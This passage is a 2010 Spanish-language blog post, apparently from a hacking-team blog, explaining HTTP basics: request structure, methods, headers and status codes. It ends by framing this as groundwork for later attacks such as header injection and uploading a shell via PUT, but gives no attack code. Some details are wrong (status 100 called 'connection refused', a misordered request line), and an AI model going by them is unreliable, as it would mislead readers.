ejecutado en el servidor. Cgi especifica un estandar para transferir datos entre el cliente y el programa. Es un mecanisimo de comunicaciones entre el servidor web y una aplicacion externa cuyo resultado final de la ejecucion son objetos MIME. Las aplicaciones que se ejecutan en el servidor reciben el nombre de CGI's.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;Objeto MIME: &lt;/span&gt;Especificaciones dirigidas al intercambio de todo tipo de archivos (texto, audio, &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;video, etc)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;Solicitud http:&lt;/span&gt; Conjunto de lineas que el navegador envia al servidor. mas adelante veremos que hay dentro de una solicitud http&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b style="color: red;"&gt;0x002:&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red; text-align: justify;"&gt;Funcionamiento del protocolo HTTP:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El proposito del protocolo http es la transferencia de archivos, principalmente en formato HTML&lt;/div&gt;&lt;div style="text-align: justify;"&gt;entre el cliente (navegador) y el servidor web.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red; text-align: justify;"&gt;Comunicacion entre el navegador y el servidor:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;En cliente envia encabezados o solicituds http el servidor las decodificaUbica el archivos que solicito el cliente dentro del servidor&lt;/div&gt;&lt;div style="text-align: justify;"&gt;el servidor envia los datos que se solicitaron al cliente como respuesta al envio de encabezados (respuesta http)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;a href="http://3.bp.blogspot.com/_eBcvsaKjQp4/TEPfE6DSsBI/AAAAAAAAAJc/l5Q4-ZkhscQ/s1600/internet-images-comm.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="227" src="http://3.bp.blogspot.com/_eBcvsaKjQp4/TEPfE6DSsBI/AAAAAAAAAJc/l5Q4-ZkhscQ/s320/internet-images-comm.gif" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red; text-align: justify;"&gt;Solicitud HTTP:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Como dijimos mas arriba, una solicitud http es un conjunto de lineas que el navegador envia el servidor&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Esta incluye:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Una linea de solicitud: linea que especifica el tipo de documento solicitado, el metodo que se aplicara y la version del protocolo utilizado.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;La linea esta formada por tres elementos que deben estar separados por un espacio.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;Campos del encabezado de solicitud:&amp;nbsp; &lt;/span&gt;Es un conjunto de lineas opcionales que permiten aportar informacion adicional sobre la solicitud (navegador, so)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;cada una de estas lineas esta formada por un nombre que describe el tipo de encabezado y el valor del encabezado.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El cuerpo de la solicitud: Es un conjunto de lineas que deben estar separadas de las lineas &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;precendetes por una linea en blanco y, por ejemplo permiten que se envien datos&lt;/div&gt;&lt;div style="text-align: justify;"&gt;por un comando POST. por lo tanto una solicitud http posee la siguiente sintaxis (&lt;crlf&gt;, significa reto&lt;br /&gt;rno de carro).&lt;br /&gt;&lt;br /&gt;METDO VERSION URL &lt;crlf&gt;&lt;br /&gt;ENCABEZADO: Valir &lt;crlf&gt;&lt;br /&gt;... ENCABEZADO: Valor &lt;crlf&gt;&lt;br /&gt;linea en blanco &lt;crlf&gt;&lt;br /&gt;cuerpo de la solicitud&lt;br /&gt;&lt;br /&gt;EJ: &lt;br /&gt;&lt;br /&gt;GET http://es.kioskea.net HTTP/1.0 Accept : Text/html If-Modified-Since : &lt;br /&gt;Saturday, 15-January-2000 14:37:11 GMT User-Agent : Mozilla/4.0 &lt;br /&gt;(compatible; MSIE 5.0; Windows 95)&lt;br /&gt;&lt;/crlf&gt;&lt;/crlf&gt;&lt;/crlf&gt;&lt;/crlf&gt;&lt;/crlf&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;0x003.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Envio de datos (Metodos)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Como todos sabemos hay diferentes formas de enviar los datos en el protocolo http, esto se lo &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;denomina metodos.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;aca dejo alguna lista con algunos metodos&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;Get: &lt;/span&gt;Es el metodo mas usado. Get obtiene cualquier tipo de informacion identificada en el fichero&lt;/div&gt;&lt;div style="text-align: justify;"&gt;al que realizemos la peticion. los parametros se pasan por url. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej: www.miweb.com.ar/index.php?a=archivo1&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;me explico ?&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;HEAD: &lt;/span&gt;Solicita el encabezado del recurso ubicado en la url especificada. este metodo nos brinda informacion&lt;/div&gt;&lt;div style="text-align: justify;"&gt;del servidor, protocolo, y mas informacion que veremos adelante.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;POST: &lt;/span&gt;Envia datos al programa, pero a diferencia del Get, no pasa los parametros por la url&lt;/div&gt;&lt;div style="text-align: justify;"&gt;este es usado para pedir que el servidor acepte informacion enviada desde el cliente. lo que pase de ahi&lt;/div&gt;&lt;div style="text-align: justify;"&gt;en adelante es tarea de la aplicacion&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;OPTIONS:&lt;/span&gt; Metodo que nos brinda gran cantidad de informacion, optios nos informa de los metodos de peticion y respuesta que admite el servidor, este metodo condiciona lo que vayamos a hacer si estamos intentando encontrar algun fallo en algun server.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;PUT:&lt;/span&gt; Es lo contrario a get. si get, lee el codigo del archivo, put, permite modificarlo y &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;sobreescribir el codigo normal&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;DELETE:&lt;/span&gt; Su propio nombre lo dice permite borrar el archivo que especifiquemos&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;0x004&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Solicitudes:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Ahora vamos a entrar en detalle de lo que puede consultar un navegador a un servidor web cuando se envia una solicitud. veremos un par de solicitudes que aparecen frecuentemente.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Accept: Acepta contenidos aceptable&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej: Accept: text/plain&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Accept-Charset: Conjunto de caracteres que son aceptables.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej:&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;Accept-Charset: iso-8859-5&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Accept-Encoding: Codificaciones o compresiones aceptables&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej: Accept-Encoding: compress , gzip&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Connection: tipo de conexion que el usuario agente preferiria&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej: Connection: Close&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Contengt Lenght: Longitud del cuerpo de la peticion en octetos.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej: Content-Length: 348&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Fecha- Date: Muestra la hora en que se envio el mensaje&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej: date: tue, 15 nov 1994 8:12:31 GMT&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Proxy Autorization: Credenciales de autorizacion para conectarse a un proxy&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej: Proxy-Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Referer: Muestra la web anterior que ha sido precedida por la web actual.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej: Referer: http://en.wikipedia.org/wiki/Main_Page.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;nbsp;0x005&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red; text-align: justify;"&gt;Respuestas:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El servidor cuando se le envia una solicitud http, esta obligado a enviar una respuesta a esta cabecera&lt;/div&gt;&lt;div style="text-align: justify;"&gt;las cabeceras que puede enviar el servidor pueden ser las siguientes:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Codigos de respuesta:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;1 xx Mensajes&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&amp;nbsp;Nº&amp;nbsp;&amp;nbsp;&amp;nbsp; Descripcion&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;100&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Conexion rechazada&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;2xx Operacion exitosa&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&amp;nbsp;Nº&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Descripcion&lt;/div&gt;&lt;div style="text-align: justify;"&gt;200&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Ok&lt;/div&gt;&lt;div style="text-align: justify;"&gt;201-03&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Info no oficial&lt;/div&gt;&lt;div style="text-align: justify;"&gt;204&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Sin contenido&lt;/div&gt;&lt;div style="text-align: justify;"&gt;205&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Contenido para recargar&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;3xx Redireccion&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&amp;nbsp;Nº&amp;nbsp;&amp;nbsp; Descripcion&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;301&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Mudado permanentemente&lt;/div&gt;&lt;div style="text-align: justify;"&gt;302&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; encontrado&lt;/div&gt;&lt;div style="text-align: justify;"&gt;303&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; vea otros&lt;/div&gt;&lt;div style="text-align: justify;"&gt;304&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; no modificado&lt;/div&gt;&lt;div style="text-align: justify;"&gt;305&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; utilice un proxy&lt;/div&gt;&lt;div style="text-align: justify;"&gt;307&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Redireccion temporal&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;4xx Error por parte del cliente&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&amp;nbsp;Nº&amp;nbsp;&amp;nbsp;&amp;nbsp; Descripcion&lt;/div&gt;&lt;div style="text-align: justify;"&gt;400&amp;nbsp;&amp;nbsp;&amp;nbsp; Solicitud incorrecta&lt;/div&gt;&lt;div style="text-align: justify;"&gt;402&amp;nbsp;&amp;nbsp;&amp;nbsp; pago requerido&lt;/div&gt;&lt;div style="text-align: justify;"&gt;403&amp;nbsp;&amp;nbsp;&amp;nbsp; prohibido&lt;/div&gt;&lt;div style="text-align: justify;"&gt;404&amp;nbsp;&amp;nbsp;&amp;nbsp; no encontrado&lt;/div&gt;&lt;div style="text-align: justify;"&gt;409&amp;nbsp;&amp;nbsp;&amp;nbsp; conflicto&lt;/div&gt;&lt;div style="text-align: justify;"&gt;410&amp;nbsp;&amp;nbsp;&amp;nbsp; ya no disponible &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Ahora veamos mas detalladamente el tipo de respuesta que puede devolver un servidor:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;Accept-Ranges:&lt;/span&gt; ¿Que tipo de contenido parcial de este rango soporta el servidor&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej: Accept-ranges: Bytes&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;Content-Encoding: &lt;/span&gt;El tipo de codificacion utilizada en los datos&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej: Content-Encoding: gzip&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;Content-languaje:&lt;/span&gt; El lenguaje es el contenido en&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej: content-languaje: da&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;Content-Lenght:&lt;/span&gt; la longitud del cuerpo de la respuesta en octetos&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej: conten-lenght:348&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;Content-type&lt;/span&gt;: El tipo mime de este contenido (formato del archivo)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej: Content-type: text/html charset=utf-8&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;Date:&lt;/span&gt; La fecha y hora que se envio el mensaje&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej: date: tue, 15 nov 1994 08.12:31 gmt&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;Last-Modified:&lt;/span&gt; Fecha limite para la modificacion del objeto solicitado en formato RFC&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej: Last-modified: tue, 15 nov 1994 12:45:26&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;Location: &lt;/span&gt;Se utiliza en la redireccion, o cuando un nuevo recurso ha sido creado&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej: location: http://www,w2.org/pub/www/people.html&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;Server:&lt;/span&gt; Nombre del servidor&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej: server: Apache/1.3.27 (unix) (Red-hat/linux)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;Set cookie:&lt;/span&gt; una cookie http&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ej: set-cookie: userid=johndoe maxa-age=3600; version=1&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Bueno estos conocimientos nos seran de gran ayuda a la hora de realizar a taques que explicare mas adelante tales como header injection, o subir shell mediante put&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&amp;nbsp;Un saludo&lt;/div&gt;&lt;div style="color: red; text-align: right;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Dr [F]&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Fuente: Wikipedia (mi gran amigo) &amp;amp; &lt;a href="http://es.kioskea.net/contents/internet/http.php3"&gt;http://es.kioskea.net/contents/internet/http.php3 &lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-74961574700351298?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/74961574700351298/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/protocolo-http.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/74961574700351298'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/74961574700351298'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/protocolo-http.html' title='Protocolo HTTP'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_eBcvsaKjQp4/TEPfE6DSsBI/AAAAAAAAAJc/l5Q4-ZkhscQ/s72-c/internet-images-comm.gif' height='72' width='72'/><thr:total>0</thr:total></entry></feed>
